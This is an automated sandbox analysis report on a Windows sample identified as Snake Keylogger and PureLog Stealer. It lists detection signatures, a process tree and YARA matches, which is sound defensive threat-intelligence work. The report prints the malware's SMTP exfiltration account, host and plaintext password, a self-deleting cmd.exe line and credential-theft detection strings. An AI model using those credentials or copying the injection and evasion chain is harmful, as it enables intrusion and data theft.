Edit tour

Windows Analysis Report
Pnihosiyvr.exe

Overview

General Information

Sample name:	Pnihosiyvr.exe
Analysis ID:	1424362
MD5:	99c80808c736d6fd95ea79e6bfe081b1
SHA1:	d275a3facf1c4a420ef8b9a66a400f3a4643580d
SHA256:	aa511f2aacc4e1166ae02e6fa9feb4f9f5f76583a040e9681781dbb79fe582c4
Infos:

Detection

PureLog Stealer, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected MSILDownloaderGeneric

Yara detected PureLog Stealer

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Modifies the context of a thread in another process (thread injection)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Pnihosiyvr.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\Pnihosiyvr.exe" MD5: 99C80808C736D6FD95EA79E6BFE081B1)

MSBuild.exe (PID: 2128 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" MD5: 2EDD0B288FE2459DA84E4274D1942343)

WerFault.exe (PID: 7060 cmdline: C:\Windows\system32\WerFault.exe -u -p 2128 -s 1412 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

sssssssssssssssss.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\sssssssssssssssss.exe" MD5: 99C80808C736D6FD95EA79E6BFE081B1)

MSBuild.exe (PID: 5640 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" MD5: 2EDD0B288FE2459DA84E4274D1942343)

cmd.exe (PID: 1684 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7056 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

sssssssssssssssss.exe (PID: 2608 cmdline: "C:\Users\user\AppData\Roaming\sssssssssssssssss.exe" MD5: 99C80808C736D6FD95EA79E6BFE081B1)

MSBuild.exe (PID: 5408 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" MD5: 2EDD0B288FE2459DA84E4274D1942343)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mensure.ceylan@guneyoto.com.tr", "Password": "Batman7221", "Host": "mail.guneyoto.com.tr", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14966:$a1: get_encryptedPassword 0x14c5c:$a2: get_encryptedUsername 0x14772:$a3: get_timePasswordChanged 0x1486d:$a4: get_passwordField 0x1497c:$a5: set_encryptedPassword 0x15f8f:$a7: get_logins 0x15ef2:$a10: KeyLoggerEventArgs 0x15b8b:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18350:$x1: $%SMTPDV$ 0x183c2:$x2: $#TheHashHere%& 0x19a25:$x3: %FTPDV$ 0x19af3:$x4: $%TelegramDv$ 0x15b8b:$x5: KeyLoggerEventArgs 0x15ef2:$x5: KeyLoggerEventArgs 0x19a49:$m2: Clipboard Logs ID 0x19bef:$m2: Screenshot Logs ID 0x19cbb:$m2: keystroke Logs ID 0x19bc7:$m4: \SnakeKeylogger\
00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1d15d:$x3: %FTPDV$ 0x1d22b:$x4: $%TelegramDv$ 0x1d181:$m2: Clipboard Logs ID 0x1d327:$m2: Screenshot Logs ID 0x1d3f3:$m2: keystroke Logs ID 0x1d2ff:$m4: \SnakeKeylogger\
00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x404d6:$a1: get_encryptedPassword 0x407cc:$a2: get_encryptedUsername 0x402e2:$a3: get_timePasswordChanged 0x403dd:$a4: get_passwordField 0x404ec:$a5: set_encryptedPassword 0x41aff:$a7: get_logins 0x41a62:$a10: KeyLoggerEventArgs 0x416fb:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x43ec0:$x1: $%SMTPDV$ 0x43f32:$x2: $#TheHashHere%& 0x45595:$x3: %FTPDV$ 0x45663:$x4: $%TelegramDv$ 0x416fb:$x5: KeyLoggerEventArgs 0x41a62:$x5: KeyLoggerEventArgs 0x455b9:$m2: Clipboard Logs ID 0x4575f:$m2: Screenshot Logs ID 0x4582b:$m2: keystroke Logs ID 0x45737:$m4: \SnakeKeylogger\
0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e1e:$a1: get_encryptedPassword 0x35256:$a1: get_encryptedPassword 0x15114:$a2: get_encryptedUsername 0x3554c:$a2: get_encryptedUsername 0x14c2a:$a3: get_timePasswordChanged 0x35062:$a3: get_timePasswordChanged 0x14d25:$a4: get_passwordField 0x3515d:$a4: get_passwordField 0x14e34:$a5: set_encryptedPassword 0x3526c:$a5: set_encryptedPassword 0x16447:$a7: get_logins 0x3687f:$a7: get_logins 0x163aa:$a10: KeyLoggerEventArgs 0x367e2:$a10: KeyLoggerEventArgs 0x16043:$a11: KeyLoggerEventArgsEventHandler 0x3647b:$a11: KeyLoggerEventArgsEventHandler
0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18808:$x1: $%SMTPDV$ 0x38c40:$x1: $%SMTPDV$ 0x1887a:$x2: $#TheHashHere%& 0x38cb2:$x2: $#TheHashHere%& 0x19edd:$x3: %FTPDV$ 0x3a315:$x3: %FTPDV$ 0x19fab:$x4: $%TelegramDv$ 0x3a3e3:$x4: $%TelegramDv$ 0x16043:$x5: KeyLoggerEventArgs 0x163aa:$x5: KeyLoggerEventArgs 0x3647b:$x5: KeyLoggerEventArgs 0x367e2:$x5: KeyLoggerEventArgs 0x19f01:$m2: Clipboard Logs ID 0x1a0a7:$m2: Screenshot Logs ID 0x1a173:$m2: keystroke Logs ID 0x3a339:$m2: Clipboard Logs ID 0x3a4df:$m2: Screenshot Logs ID 0x3a5ab:$m2: keystroke Logs ID 0x1a07f:$m4: \SnakeKeylogger\ 0x3a4b7:$m4: \SnakeKeylogger\
0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2769148817.000001D298B45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2774836682.000001D2A9703000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x635e6:$a1: get_encryptedPassword 0x83a1e:$a1: get_encryptedPassword 0x638dc:$a2: get_encryptedUsername 0x83d14:$a2: get_encryptedUsername 0x633f2:$a3: get_timePasswordChanged 0x8382a:$a3: get_timePasswordChanged 0x634ed:$a4: get_passwordField 0x83925:$a4: get_passwordField 0x635fc:$a5: set_encryptedPassword 0x83a34:$a5: set_encryptedPassword 0x64c0f:$a7: get_logins 0x85047:$a7: get_logins 0x64b72:$a10: KeyLoggerEventArgs 0x84faa:$a10: KeyLoggerEventArgs 0x6480b:$a11: KeyLoggerEventArgsEventHandler 0x84c43:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x66fd0:$x1: $%SMTPDV$ 0x87408:$x1: $%SMTPDV$ 0x67042:$x2: $#TheHashHere%& 0x8747a:$x2: $#TheHashHere%& 0x686a5:$x3: %FTPDV$ 0x88add:$x3: %FTPDV$ 0x68773:$x4: $%TelegramDv$ 0x88bab:$x4: $%TelegramDv$ 0x6480b:$x5: KeyLoggerEventArgs 0x64b72:$x5: KeyLoggerEventArgs 0x84c43:$x5: KeyLoggerEventArgs 0x84faa:$x5: KeyLoggerEventArgs 0x686c9:$m2: Clipboard Logs ID 0x6886f:$m2: Screenshot Logs ID 0x6893b:$m2: keystroke Logs ID 0x88b01:$m2: Clipboard Logs ID 0x88ca7:$m2: Screenshot Logs ID 0x88d73:$m2: keystroke Logs ID 0x68847:$m4: \SnakeKeylogger\ 0x88c7f:$m4: \SnakeKeylogger\
00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2774836682.000001D2A98B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xdef5:$x3: %FTPDV$ 0xdfc3:$x4: $%TelegramDv$ 0xdf19:$m2: Clipboard Logs ID 0xe0bf:$m2: Screenshot Logs ID 0xe18b:$m2: keystroke Logs ID 0xe097:$m4: \SnakeKeylogger\
00000000.00000002.2325981322.000001A32CB00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x146e6:$a1: get_encryptedPassword 0x149dc:$a2: get_encryptedUsername 0x144f2:$a3: get_timePasswordChanged 0x145ed:$a4: get_passwordField 0x146fc:$a5: set_encryptedPassword 0x15d0f:$a7: get_logins 0x15c72:$a10: KeyLoggerEventArgs 0x1590b:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180d0:$x1: $%SMTPDV$ 0x18142:$x2: $#TheHashHere%& 0x197a5:$x3: %FTPDV$ 0x19873:$x4: $%TelegramDv$ 0x1590b:$x5: KeyLoggerEventArgs 0x15c72:$x5: KeyLoggerEventArgs 0x197c9:$m2: Clipboard Logs ID 0x1996f:$m2: Screenshot Logs ID 0x19a3b:$m2: keystroke Logs ID 0x19947:$m4: \SnakeKeylogger\
00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xd83d:$x3: %FTPDV$ 0xd90b:$x4: $%TelegramDv$ 0xd861:$m2: Clipboard Logs ID 0xda07:$m2: Screenshot Logs ID 0xdad3:$m2: keystroke Logs ID 0xd9df:$m4: \SnakeKeylogger\
00000000.00000002.2327536841.000001A33D6EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.2333090134.000001A3456F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10f056:$a1: get_encryptedPassword 0x12f48e:$a1: get_encryptedPassword 0x10f34c:$a2: get_encryptedUsername 0x12f784:$a2: get_encryptedUsername 0x10ee62:$a3: get_timePasswordChanged 0x12f29a:$a3: get_timePasswordChanged 0x10ef5d:$a4: get_passwordField 0x12f395:$a4: get_passwordField 0x10f06c:$a5: set_encryptedPassword 0x12f4a4:$a5: set_encryptedPassword 0x11067f:$a7: get_logins 0x130ab7:$a7: get_logins 0x1105e2:$a10: KeyLoggerEventArgs 0x130a1a:$a10: KeyLoggerEventArgs 0x11027b:$a11: KeyLoggerEventArgsEventHandler 0x1306b3:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x112a40:$x1: $%SMTPDV$ 0x132e78:$x1: $%SMTPDV$ 0x112ab2:$x2: $#TheHashHere%& 0x132eea:$x2: $#TheHashHere%& 0x114115:$x3: %FTPDV$ 0x13454d:$x3: %FTPDV$ 0x1141e3:$x4: $%TelegramDv$ 0x13461b:$x4: $%TelegramDv$ 0x11027b:$x5: KeyLoggerEventArgs 0x1105e2:$x5: KeyLoggerEventArgs 0x1306b3:$x5: KeyLoggerEventArgs 0x130a1a:$x5: KeyLoggerEventArgs 0x114139:$m2: Clipboard Logs ID 0x1142df:$m2: Screenshot Logs ID 0x1143ab:$m2: keystroke Logs ID 0x134571:$m2: Clipboard Logs ID 0x134717:$m2: Screenshot Logs ID 0x1347e3:$m2: keystroke Logs ID 0x1142b7:$m4: \SnakeKeylogger\ 0x1346ef:$m4: \SnakeKeylogger\
00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2327536841.000001A33CFF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	JoeSecurity_MSIL_Downloader_Generic	Yara detected MSIL_Downloader_Generic	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Pnihosiyvr.exe PID: 6180	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x18ff:$a1: get_encryptedPassword 0x255a3f:$a1: get_encryptedPassword 0x1beb:$a2: get_encryptedUsername 0x255bdf:$a2: get_encryptedUsername 0x1715:$a3: get_timePasswordChanged 0x255873:$a3: get_timePasswordChanged 0x1810:$a4: get_passwordField 0x255962:$a4: get_passwordField 0x1915:$a5: set_encryptedPassword 0x255a55:$a5: set_encryptedPassword 0x3e8c:$a7: get_logins 0x257690:$a7: get_logins 0x3def:$a10: KeyLoggerEventArgs 0x257623:$a10: KeyLoggerEventArgs 0x3a88:$a11: KeyLoggerEventArgsEventHandler 0x2573b7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Pnihosiyvr.exe PID: 6180	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3a88:$x5: KeyLoggerEventArgs 0x3def:$x5: KeyLoggerEventArgs 0x46dd:$x5: KeyLoggerEventArgs 0x4a11:$x5: KeyLoggerEventArgs 0x2573b7:$x5: KeyLoggerEventArgs 0x257623:$x5: KeyLoggerEventArgs 0x257d22:$x5: KeyLoggerEventArgs 0x258056:$x5: KeyLoggerEventArgs 0x602d:$m2: Clipboard Logs ID 0x60fa:$m2: Screenshot Logs ID 0x612e:$m2: keystroke Logs ID 0x259563:$m2: Clipboard Logs ID 0x259630:$m2: Screenshot Logs ID 0x259664:$m2: keystroke Logs ID 0x2693e7:$m2: Clipboard Logs ID 0x2694b4:$m2: Screenshot Logs ID 0x2694e8:$m2: keystroke Logs ID 0x60e6:$m4: \SnakeKeylogger\ 0x25961c:$m4: \SnakeKeylogger\ 0x2694a0:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 2128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 2128	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 2128	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x282e1:$a1: get_encryptedPassword 0x285cd:$a2: get_encryptedUsername 0x280f7:$a3: get_timePasswordChanged 0x281f2:$a4: get_passwordField 0x282f7:$a5: set_encryptedPassword 0x2a86e:$a7: get_logins 0x2a7d1:$a10: KeyLoggerEventArgs 0x2a46a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 2128	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2a46a:$x5: KeyLoggerEventArgs 0x2a7d1:$x5: KeyLoggerEventArgs 0x2b0bf:$x5: KeyLoggerEventArgs 0x2b3f3:$x5: KeyLoggerEventArgs 0x2ca0f:$m2: Clipboard Logs ID 0x2cadc:$m2: Screenshot Logs ID 0x2cb10:$m2: keystroke Logs ID 0x2cac8:$m4: \SnakeKeylogger\
Process Memory Space: sssssssssssssssss.exe PID: 6136	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 6136	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 6136	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 6136	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 6136	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x70ff:$a1: get_encryptedPassword 0x5f3be:$a1: get_encryptedPassword 0x73eb:$a2: get_encryptedUsername 0x5f597:$a2: get_encryptedUsername 0x6f15:$a3: get_timePasswordChanged 0x5f1e7:$a3: get_timePasswordChanged 0x7010:$a4: get_passwordField 0x5f2d6:$a4: get_passwordField 0x7115:$a5: set_encryptedPassword 0x5f3d4:$a5: set_encryptedPassword 0x968c:$a7: get_logins 0x6126b:$a7: get_logins 0x95ef:$a10: KeyLoggerEventArgs 0x611d8:$a10: KeyLoggerEventArgs 0x9288:$a11: KeyLoggerEventArgsEventHandler 0x60f2f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: sssssssssssssssss.exe PID: 6136	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x9288:$x5: KeyLoggerEventArgs 0x95ef:$x5: KeyLoggerEventArgs 0x9edd:$x5: KeyLoggerEventArgs 0xa211:$x5: KeyLoggerEventArgs 0x60f2f:$x5: KeyLoggerEventArgs 0x611d8:$x5: KeyLoggerEventArgs 0x61950:$x5: KeyLoggerEventArgs 0x61c84:$x5: KeyLoggerEventArgs 0x383a:$m2: Clipboard Logs ID 0x3907:$m2: Screenshot Logs ID 0x393b:$m2: keystroke Logs ID 0xb82d:$m2: Clipboard Logs ID 0xb8fa:$m2: Screenshot Logs ID 0xb92e:$m2: keystroke Logs ID 0x63200:$m2: Clipboard Logs ID 0x632cd:$m2: Screenshot Logs ID 0x63301:$m2: keystroke Logs ID 0x38f3:$m4: \SnakeKeylogger\ 0xb8e6:$m4: \SnakeKeylogger\ 0x632b9:$m4: \SnakeKeylogger\
Process Memory Space: sssssssssssssssss.exe PID: 2608	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 2608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 2608	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 2608	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: sssssssssssssssss.exe PID: 2608	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ac5:$a1: get_encryptedPassword 0x12db1:$a2: get_encryptedUsername 0x128db:$a3: get_timePasswordChanged 0x129d6:$a4: get_passwordField 0x12adb:$a5: set_encryptedPassword 0x15052:$a7: get_logins 0x14fb5:$a10: KeyLoggerEventArgs 0x14c4e:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: sssssssssssssssss.exe PID: 2608	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x14c4e:$x5: KeyLoggerEventArgs 0x14fb5:$x5: KeyLoggerEventArgs 0x158a3:$x5: KeyLoggerEventArgs 0x15bd7:$x5: KeyLoggerEventArgs 0x171f3:$m2: Clipboard Logs ID 0x172c0:$m2: Screenshot Logs ID 0x172f4:$m2: keystroke Logs ID 0x21b82:$m2: Clipboard Logs ID 0x21c4f:$m2: Screenshot Logs ID 0x21c83:$m2: keystroke Logs ID 0x172ac:$m4: \SnakeKeylogger\ 0x21c3b:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 5640	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 5408	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 70 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.sssssssssssssssss.exe.1d298b4c3c8.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.sssssssssssssssss.exe.1d298b4c3c8.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.sssssssssssssssss.exe.1d2a9798318.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.sssssssssssssssss.exe.1d2a98b03c0.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.sssssssssssssssss.exe.1d2a9810388.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Pnihosiyvr.exe.1a32cb00000.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.MSBuild.exe.140000000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.MSBuild.exe.140000000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
